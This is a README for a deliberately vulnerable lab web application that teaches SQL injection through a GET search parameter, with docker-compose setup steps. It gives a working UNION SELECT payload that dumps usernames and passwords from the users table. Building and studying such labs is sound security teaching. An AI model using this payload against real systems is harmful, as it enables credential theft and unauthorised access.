SQL GET Injection

pipeline status Latest Release Try in PwD

SQL GET Injection

An example web application that can be hacked using SQL injection attack. The app uses a MySQL database, and parameters are sent using a GET parameter.

Simply use this search query (for example):

abc' union select null, username, password from users where username like '%

Try in Play with Docker

Try in PwD

Run with docker-compose

You can run the vulnerable app using docker-compose:

mkdir sql-get-injection
cd sql-get-injection
curl -o docker-compose.yml https://gitlab.cylab.be/cylab/play/sql-get-injection/-/raw/main/docker-compose.yml
docker-compose up

After a few seconds, the app will be available at http://127.0.0.1:8000

Local testing

The repository has a docker-compose-dev.yml that you can use to test or contribute:

git clone https://gitlab.cylab.be/cylab/play/sql-get-injection.git
cd sql-get-injection
docker-compose -f docker-compose-dev.yml up
This website uses cookies. More information about the use of cookies is available in the cookies policy.
Accept